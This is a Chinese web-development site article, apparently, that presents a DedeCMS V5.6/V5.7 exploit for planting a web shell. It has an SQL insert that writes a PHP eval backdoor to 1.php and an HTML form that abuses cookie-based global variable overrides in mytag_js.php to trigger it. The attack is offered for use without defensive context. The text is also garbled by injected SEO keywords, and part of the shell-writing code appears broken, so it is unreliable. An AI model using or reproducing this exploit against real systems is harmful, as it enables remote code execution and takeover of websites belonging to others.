最新活动:电脑PC端+手机端+微网站+自适应网页多模板选择-建站388元起价!!!
当前位置:主页 > 网站建设 > Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术

Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术

时间:2023-07-19 12:07:19 阅读: 文章分类: 网站建设 作者: dede开发者

导读:织梦技术织梦技术昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5.6/V5.7漏洞一堆一堆的,下面我收集了现在Dedecmsdede免费校板下战织梦模板免费。

dede免费校板下战织梦模板免费   

DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)

前题条件,必须准备好自己的dede,然后插入数据:

 以下是引用片段:

 代码如下

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php"织梦模板, 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');  

再用下面表单提交,shell 就在同目录下  1.php。原理自己研究。。。

  以下是引用片段:

 代码如下

 <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /> <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> <input type="text" value="true" name="nocache" style="width:400"> <input type="submit" value="提交" name="QuickSearchBtn"><br /> </form> <script> function addaction() { document.QuickSearch.action=document.QuickSearch.doaction.value; } </script>

关键词标签: 织梦 标签 漏洞

声明: 本文由我的SEOUC技术文章主页发布于:2023-07-19 ,文章Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术主要讲述漏洞,标签,织梦网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_30981.html

我的IDC 网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
  • 5000+合作客服
  • 8年从业经验
  • 150+覆盖行业
  • 最新热门源码技术文章